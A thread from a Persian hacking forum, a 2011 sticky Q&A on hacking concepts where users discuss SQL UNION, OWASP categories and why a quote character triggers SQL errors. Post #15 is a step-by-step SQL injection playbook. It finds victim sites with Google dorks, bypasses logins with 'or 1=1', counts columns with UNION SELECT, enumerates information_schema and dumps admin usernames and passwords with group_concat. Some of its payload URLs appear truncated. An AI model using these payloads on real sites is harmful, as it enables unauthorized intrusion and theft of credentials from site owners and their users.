اطلاعیه

Collapse
No announcement yet.

سوالات شما در مورد اصطلاحات و مفاهیم هک

Collapse
This is a sticky topic.
X
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • سوالات شما در مورد اصطلاحات Ùˆ مفاهیم Ù‡Ú©

    اینجا سوالات خودتون رو بپرسید

    اما قبلش به نکات زیر توجه کنید

    برای اولین بار سوالات تکراری هم مشکلی نداره پرسیدنش
    تا رسیدن به جواب صبور باشید
    کسانی که جواب میدن حقوق دریافت نمیکنن پس انتظار نداشته باشید وقتی سوالی مطرح شد سریعا حواب بدن
    قبل از پرسیدن search کنید
    سعی کنید زیان انگلیسی هم یاد بگیرید چون اکثر منابع به انگلیسی هستند اما از کپی و paste کردن مطالب غیر فارسی خودداری فرمایید
    لطفا فقط سوالات تکنیکال خودتون رو مطرح کنید
    این تاپیک رو با تاپیک رفع اشکال و target اشتباه نگیرید

    خلاصه بیشتر یک تاپیک مد نظرمون هست که بشه روی یکسری مباحث پیچیده بحث کرد نه یک دیکشنری هکری !

    بیشتر هم در مورد web application hacking میخوایم بحث کنیم اما network هم جدایی ناپذیره

    قبل از پرسیدن سوال شما باید
    ۱- با شبکه و +network آشنایی داشته باشید
    ۲- با کامند های سیستم عامل های linux و ویندوز آشنایی داشته باشید
    ۳- با نحوه کار کردن وب سایت ها و application ها آشنایی داشته باشید

    در ابتدای امر هم منتظر نباشید اساتید جواب بدن
    وقتی کسی چیزی پرسید خود شما هم در صورت اطلاع سعی کنید جواب بدید و یا مطلب به درد بخوری ارائه کنید
    Emperor Hacking Team

    سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
    عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

    آدرس توئیتر من:https://twitter.com/#!/iM4n_

    به صفحه شبگرد در فیسبوک بپیوندید
    http://www.facebook.com/groups/shabgard

    تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید

    sigpic

  • #2
    خوب بازم من شروع کننده هستم !!!!
    دوستان من نشستم کلی تعریف و صفحه در مورد union خوندم و متوجه شدم که یک دستور ترکیب گره که مثلا میتونه چند ایتم رو با هم combine کنه و به خروجی بده و همچنین میتونه چند تیبل روی توی یک ردیف هم همین طور ترکیب کنه و خروجی مورد نظر رو بده
    همین طور طرز کارش شبیه دستور join هستش و میتونه اطلاعاتی که به هم مربوط میشن رو ترکیب و خروجی بده
    فرق union , union all اینه که یونیون برای یک سری اطلاعات مشخص و مد نظر در نظر گرفته شده ولی union all برای کلیه مقادیر به کار میره و اطلاعات شبیه هم رو ادغام نمیکنه !!
    اینم یک سورس اینگلیسی :
    UNION
    The UNION command is used to select related information from two tables, much like the JOIN command. However, when using the UNION command all selected columns need to be of the same data type. With UNION, only distinct values are selected.

    UNION ALL
    The UNION ALL command is equal to the UNION command, except that UNION ALL selects all values.

    The difference between Union and Union all is that Union all will not eliminate duplicate rows, instead it just pulls all rows from all tables fitting your query specifics and combines them into a table.

    A UNION statement effectively does a SELECT DISTINCT on the results set. If you know that all the records returned are unique from your union, use UNION ALL instead, it gives faster results.
    ! اینم یک سورس خوب که به نظرم حیف بود نذارم ! : http://msdn.microsoft.com/en-us/library/ms180026.aspx

    حالا اگر جایش رو کم گفتم بگین یا اگر جاییش رو بد متوجه شدم راهنماییم کنید !!

    در ضمن دوستان من هنوز متوجه نشدم وقتی روی یک سایت ور میریم ! کدوم دیتا بیس رو باید انتخاب کنیم برای جستجو توی اون ! مثلا وقتی کلی دیتا بیس هست و information schema هم هست کدوم یکی رو باید انتخاب کرد و چرا ؟؟؟
    Last edited by conter; 12-24-2011, 08:25 AM.
    شاید تو که زبان باستانی روی مانیتور لپ تاپت رو به موشکی که کنار گوشت پرتاب شده ترجیح میدی به دید عمیقی از زندگی رسیده باشی که برای دیگران قابل درک نیست

    Comment


    • #3
      میشه کل متد ها رو دسته بندی کنید!
      منظورم اینه که جز sql و RFI و LFI چه متد های دیگه هستند
      کاربرد هر کدومشون کجاست؟
      به طرو خلاصه بیان کنید ممنون میشم
      -

      Comment


      • #4
        دو تا دسته بندی Owasp

        1- آسیب پذیری یا Vulnerability
        https://www.owasp.org/index.php/Category:Vulnerability
        2- حملات یا Attacks
        https://www.owasp.org/index.php/Category:Attack
        Emperor Hacking Team

        سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
        عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

        آدرس توئیتر من:https://twitter.com/#!/iM4n_

        به صفحه شبگرد در فیسبوک بپیوندید
        http://www.facebook.com/groups/shabgard

        تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید

        sigpic

        Comment


        • #5
          مرا دریابید !!!!
          Last edited by conter; 12-24-2011, 12:26 PM.
          شاید تو که زبان باستانی روی مانیتور لپ تاپت رو به موشکی که کنار گوشت پرتاب شده ترجیح میدی به دید عمیقی از زندگی رسیده باشی که برای دیگران قابل درک نیست

          Comment


          • #6
            حتما +Network بخون !!
            اون s رو هم از ته https ها بردار شاید باز شد !
            Emperor Hacking Team

            سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
            عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

            آدرس توئیتر من:https://twitter.com/#!/iM4n_

            به صفحه شبگرد در فیسبوک بپیوندید
            http://www.facebook.com/groups/shabgard

            تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید

            sigpic

            Comment


            • #7
              با سلام و تشکر
              جریان این کاراکتر ' توی sqli چیه؟؟
              یادمه جوکر چند بار گفته بود که این کاراکتر یه جریانی داره اما توضیح نداد در موردش
              اگه توضیح بدین ممنون میشم
              این کاراکتر دقیقا چه طوری باعث آشکار سازی آسیب پذیری یه جدول می شه
              با تشکر
              -

              Comment


              • #8
                این سوال دیگه خیلی ابتدایی بود
                توی دوتا لینک بالایی جواب خیلی از سوالاتتون هست
                ابتدای تمام آموزش های فارسی sql injection هم این مطلب بیان شده
                بارها اینجا پرسیده شده
                واقعا اینو نمیدونی یا داری سر کارمون میزاری ؟

                در یک کلام
                شما با ' یا گذاشتن - به صورت
                'id=12
                یا
                id=-12
                و چند تا چیز دیگه
                باعث میشی که یک مقدار نا معتبر رو درخواست کنی و Error بگیری
                البته در صورت وجود آسیب پذیری

                من با فرض اینکه اینو بلدین این تاپیکو زدما
                Last edited by iM4n; 12-24-2011, 02:40 PM.
                Emperor Hacking Team

                سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
                عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

                آدرس توئیتر من:https://twitter.com/#!/iM4n_

                به صفحه شبگرد در فیسبوک بپیوندید
                http://www.facebook.com/groups/shabgard

                تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید

                sigpic

                Comment


                • #9
                  يه 4-5 خط در موردش نوشتم ، بعد گفتم اگه الان جواب بدم باز هم اصولي ياد نميگيريد
                  در مورد كاراكترهاي رزرو شده در زبان استاندارد sql تحقيق كنيد بياين نتيجه را بنويسيد

                  Comment


                  • #10
                    چه جوری میشه نقشه ی شبکه رو بدست آورد؟ من نرم افزار dude رو باهاش کار کردم. باحالتر چی دارید؟
                    برای کشتن پرنده نیازی به تیرو کمان نیست، همین که بالهایش را بچینی خاطرات پرواز روزی صدبار او را خواهد کشت...

                    دوزخیان

                    Comment


                    • #11
                      نوشته اصلی توسط saeed hg نمایش پست ها
                      چه جوری میشه نقشه ی شبکه رو بدست آورد؟ من نرم افزار dude رو باهاش کار کردم. باحالتر چی دارید؟

                      تنها چیزی که یادم میاد اینه:
                      Cheops

                      http://cheops-ng.sourceforge.net

                      دوستان چیز باحالتر دارن بزارن

                      در ضمن این سوال کلیه
                      یکم رفع اشکالی برخورد کن با این تاپیک
                      Emperor Hacking Team

                      سکوت در جای جای مکتوبات مقدسشان به چشم می خورد و خیانتها در پی هم. اگر با آنها باشی چه خوب است.
                      عاشقانه تو را بر مکتوباتشان می پذیرند و هنگامی که می خواهی با آنان نباشی ، خون تو را از آب چشمه های کوهستان گوارا تر می پندارند!

                      آدرس توئیتر من:https://twitter.com/#!/iM4n_

                      به صفحه شبگرد در فیسبوک بپیوندید
                      http://www.facebook.com/groups/shabgard

                      تیم Emperor عضو جدید میپذیرد ! برای اطلاعات بیشتر با خودم تماس بگیرید

                      sigpic

                      Comment


                      • #12
                        نوشته اصلی توسط iM4n نمایش پست ها
                        در یک کلام
                        شما با ' یا گذاشتن - به صورت

                        و چند تا چیز دیگه
                        باعث میشی که یک مقدار نا معتبر رو درخواست کنی و Error بگیری
                        البته در صورت وجود آسیب پذیری

                        من با فرض اینکه اینو بلدین این تاپیکو زدما
                        ایمان جان این رو که می دونم
                        منظورم چیز دیگه ای بود
                        ببنید خب مشخص هست که وقتی یه کاراکتر اینطوری وارد می کنیم یه مقدار نامعتبر درخواست کردیم
                        منظورم این بود که وقتی این رو می زنیم چه بلایی سر جدول می اد
                        چه دستوراتی درون database اجرا می کنه ؟
                        منظورم این بود که با جزئیات بیان کنید
                        -

                        Comment


                        • #13
                          وقتی شما می زنید : http://site.com/news.php?id=1
                          پی اچ پی از mysql مثلا با دستور زیر خبر شماره 1 که تو جدول با id مشخص هست رو نشون میده :
                          کد:
                          SELECT khabar FROM news WHERE id=$url
                          یا یه چنین چیزی !
                          وقتی ' به آخرش اضافه شه یه دستور غیر معتبر SQL میشه و ارور میده !

                          این توضیحات درک بنده از SQLi هست اما چون برنامه نویس نیستم یقین ندارم اگه اشتباهه دوستان تصحیح کنن

                          Comment


                          • #14
                            نوشته اصلی توسط masoudi نمایش پست ها
                            وقتی شما می زنید : http://site.com/news.php?id=1
                            پی اچ پی از mysql مثلا با دستور زیر خبر شماره 1 که تو جدول با id مشخص هست رو نشون میده :
                            کد:
                            SELECT khabar FROM news WHERE id=$url
                            یا یه چنین چیزی !
                            وقتی ' به آخرش اضافه شه یه دستور غیر معتبر SQL میشه و ارور میده !

                            این توضیحات درک بنده از SQLi هست اما چون برنامه نویس نیستم یقین ندارم اگه اشتباهه دوستان تصحیح کنن
                            دستور زیر رو دقت کنید:
                            کد:
                            statement = "SELECT * FROM users WHERE name = '" + userName + "';"
                            حالا اگر به جای userName ما اون کاراکتر رو بزاریم مقدار statement چی میشه؟
                            در اصل مقدار userName بین دو علامت ' هست. اگر خود userName هم علامت ' بشه مشکل ایجاد میشه . و چونکه userName رو ما علامت ' گذاشتیم نتیجه مثل زیر میشه:

                            کد:
                            statement = "SELECT * FROM users WHERE name = ''';
                            و همین کاراکتر اضافه ' باعث خطا میشه . حالا وقتی ما با استفاده از این خطا کد خودمون رو تزریق کنیم اصطلاحا SQLi یا Sql injection میگن

                            کد:
                            http://en.wikipedia.org/wiki/SQL_injection
                            Last edited by Fri3nds; 12-25-2011, 09:54 AM.
                            احب الاعمال الي الله أدومها وان قل


                            پیامبر اکرم (ص):
                            محبوبترين كارها در پيش خدا كاريست كه دوام آن بيشتر است ، اگر چه اندك باشد .


                            سایت شهر سامن: http://csamen.ir
                            گالری تصاویر : http://gallery.csamen.ir

                            Comment


                            • #15
                              با سلام
                              این ها رو هم باز توی دست نوشته هام دیدم از همون اموزش های تصویری هست خلاصه نویسی کردم قبلا
                              امیدوارم به درد بخوره
                              Srry for Finglish
                              SQL injection
                              1 - ebteda ba estefade az dorok haye google donbale target begard
                              inurl:news.php?id=
                              inurl:(productList.asp)?id=
                              2- baad address be dast amade az natije jostejo ra be site zir bede
                              http://blogueavbt.com/sqlgoogle.php
                              3- site zir ghesmat haye asib pazir ra be to midahad

                              -=-=-=-=-
                              alamate soal ~>>? haman WHERE dar SQL ast
                              4- baad dar address site baraye tashkhis asib paziri az parameter haye zir estefade mi****m
                              ==========================================>>',";*
                              ya mitavanim dar ghesmate login az "admin or 1=1 " estefade ****m
                              -=-=-=-=-=-=-=-
                              5 baad az in ke target ra peyda kardim shoro mi****m
                              aval ba estefade az dastor zir teedade column ha ro peyda mi****m
                              www.target.com/news.php?id=-999+order+by+5--
                              -999 : az teedade column ha bayad kamtar bashad va be hamin dalil -999 entekhab kardim
                              mitonim be jaye + az psace estefade ****m
                              dar inja bayad yek adade tasadofi entekhab ****m masalan 5 va farz migirim teedad column ha 5 bashad
                              hala address ra ejra mikonm
                              query error is : unknown column '5' in 'order clause' => yani column shomare 5 nashenakht ast va vojod nadarad pas 1 vahed kam mi****m
                              www.target.com/news.php?id=-999+order+by+4--
                              agar site load shod => pas mifahmim ke teedade column ha 4 ast
                              bazi mavaghe dastoor order by kar nemikone va bayad az Union Select estefade ****m :
                              http://www.target.com/news.php?id=74...LECT+1,2,3,4--
                              va agar az addade 5 estefade ****m error midahad
                              http://www.target.com/news.php?id=74...CT+1,2,3,4,5--
                              ----=-=-=-=
                              http://www.DomainName.com/Products/P...?ProductId=164 or 1=1
                              chon 1 hamishe barabare 1 ast dar natije har satre jadval ra nemayehs midahad

                              SELECT “column_name”
                              FROM “table_name”
                              WHERE “condition”
                              ORDER BY “column_name” [ASC, DESC]
                              -=-=-==
                              baray peyda kardane column az union select estefade mi****m
                              http://www.target.com/news.php?id=74...lect+1,2,3,4--
                              agar dar inja safhe load shod yani teedad 4 mibashad
                              agar error dad teedad ra bishtar mi****m
                              hala bayad did ke kodam yek az column ha ghabel tazrigh ast chon column hayte ghabel tazrigh ra be ma neshan nadade ma az khataye manteghi estefade mi****m:
                              http://www.target.com/news.php?id=-7...lect+1,2,3,4--
                              YA AZ In Dastor:
                              http://www.target.com/news.php?id=99...lect+1,2,3,4--
                              YA AZ In Dastor
                              http://www.target.com/news.php?id=74...lect+1,2,3,4--
                              http://www.Domains.com/Full_Stand.asp?news_id=''having 1=1--
                              -=-==
                              peyda kardane version payegahe dade va sayere teelaaat:
                              http://www.target.com/news.php?id=74...ersion(),3,4--
                              dar bala be jaye 2 az Version() estefade kardim ke version payegah dade ra be ma neshan midahd
                              http://www.target.com/news.php?id=74...@Version,3,4--
                              baraye be dast avardane name karbar:
                              http://www.target.com/news.php?id=74...1,User(),3,4--
                              baraye be dast avardane name database:
                              http://www.target.com/news.php?id=74...Database(),4--
                              <<<<NOKET>>>:
                              bazi oghat be dalile estefade az mabnahaye mokhtalefi tavasote barnamenevis,bayad in mabna ha ro tabdil kard
                              khataye zir neshan mide ke bayad tabdile mabna anjam bedim:
                              Illegal mix of collations(latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'union'
                              baraye tabdil az dastor zir estefade mi****m:
                              Unhex(hex(Version()))
                              unhex(hex(User()))
                              unhex(hex(DataBAse()))
                              va ya dastor convert
                              convert(User() using Latin1)
                              mesal:
                              http://www.target.com/news.php?id=74...@Version,3,4--
                              be jash az dastor
                              http://www.target.com/news.php?id=74...sion())),3,4--
                              -=-=-=-=-=-=
                              peyda kardane password ha va user ha:
                              aval az asib pazir bodane site motmaen mishim
                              baad donbale version data base migardim
                              baad ba dastore zir donbale tabale migardim (farzan admin)
                              http://www.target.com/news.php?id=74...+1,version,3,4 From+Admin--
                              baad az name table bayad name column ro peyda ****m(farzan user)

                              http://www.target.com/news.php?id=74...ect+1,user,3,4 From+Admin--
                              <<<<NOKTE>>>:
                              baraye biron keshidane name table culmn ha az yek column ghabl tazrigh az dastor zir estefade mi****m:
                              Concat(ColumnName1,.....ColumnNameN)
                              http://www.target.com/news.php?id=74...,password),3,4 From+Admin--
                              ba anjam in amal mohtava neshan dade mishavad ama etelaat yek ja hastand va beyne anha fasele nist
                              baraye ijade fasele beyne etelaata az code hexedecimale karaktere ':' estefade miknim be in sorat
                              http://www.target.com/news.php?id=74...,password),3,4 From+Admin--
                              ke 0x yani Hexedecimal va 31 ham kode hexedecimale : ast
                              ya mitavanim az char(58) estefade ****m
                              baraye admin haye bishtar az 1 az dastor group_concat estefade mi****m:
                              http://www.target.com/news.php?id=74...,password),3,4 From+Admin--
                              -=-=-=-=-=-=-=-=-=-=-=-=
                              peyda kardane name jadval vad database ...:
                              aval target baad peyda krdane column ha...

                              dar serverhayi ke version anha 5 ast yek database moshtarak be name Information_schema hast ke etelaate name database va ..ro negah dari mikone
                              va dar on yek jadval be name Tables dare ke tamame etelaate jadval ro neshon mide
                              jadvali be esme Schemata vojod dare ke etelaate tamame database ro dare
                              jadavale digi ham be name columns hast ke etelaate tamame column ha ro negah dari mikone
                              ba estefade az in etelaat mitonim etelaate serverhayi ke database version 5 daran ro be dast biarim
                              http://www.target.com/news.php?id=74...chema_name,3,4 From+Information_schema.Schemata--
                              baraye be dast avardane table:
                              http://www.target.com/news.php?id=74...table_name,3,4 From+Information_schema.tables--
                              baraye moshakhas kardane name tablae be hamrhae data base az dastore concat estefade mi****m:
                              http://www.target.com/news.php?id=74...LE_SCHEMA),3,4 From+Information_schema.tables--
                              baraye be dast avardane column'ha:
                              http://www.target.com/news.php?id=74...LE_SCHEMA),3,4 From+Information_schema.colums--
                              baraye be dast avardane username va pass ham az raveshe bala estefade miklonim
                              http://www.target.com/news.php?id=74...(username),3,4 From+tblADmin--
                              http://www.target.com/news.php?id=74...,password),3,4 From+tblADmin--
                              -=-=-=-=-=-=-==-=-=-=-=
                              mahdod kardane etelaate khoroji:
                              baraye mahdod kardane khoroji az dastorate zir estefade mi****m(db1 name database va test1 name table
                              SELECT * FROM db1.test1 limit 1,1
                              SELECT * FROM db1.test1 limit 1,2
                              SELECT * FROM db1.test1 limit 1,3
                              Ya
                              SELECT * FROM db1.test1 limit 1 offset 0
                              SELECT * FROM db1.test1 limit 1 offset 1
                              SELECT * FROM db1.test1 limit 1 offset 2
                              aval target ro entekhab mi****m baad ....name DataBase ro biron mikeshim:
                              http://www.target.com/news.php?id=74...chema_name,3,4 From+Information_schema.Schemata--
                              az group_concat estefade mi****m ta bebinim faghat yek database dare ya na?
                              http://www.target.com/news.php?id=74...hema_name),3,4 From+Information_schema.Schemata--
                              hala name jadval ha ro be dast miarim:
                              http://www.target.com/news.php?id=74...able_name),3,4 From+Information_schema.tables--
                              agar name jadval ha ziyad bod az dastorate limit va offset estefade mi****m
                              http://www.target.com/news.php?id=74...table_name,3,4 From+Information_schema.tables limit 1 offset 0--
                              va be hamin tartip be meghdare offset ezafe mi****m ta be jadvale delkhaheman beresim
                              rahe dige estefade az dastor limit be tanhayi hast
                              http://www.target.com/news.php?id=74...table_name,3,4 From+Information_schema.tables limit 1,1
                              baraye name sotonha niz mitonim az in dastor estefade ****m
                              in dastor zamani estefade mishe ke msite morede nazare be dalile dashtane sotonha va satr haye ziad dar yek jadval mamande tables ya columns natone tamami satr ha va soton ha ro neshon bede
                              http://www.target.com/news.php?id=74...lumns_name,3,4 From+Information_schema.columns limit 1,1
                              -

                              Comment

                              Working...
                              X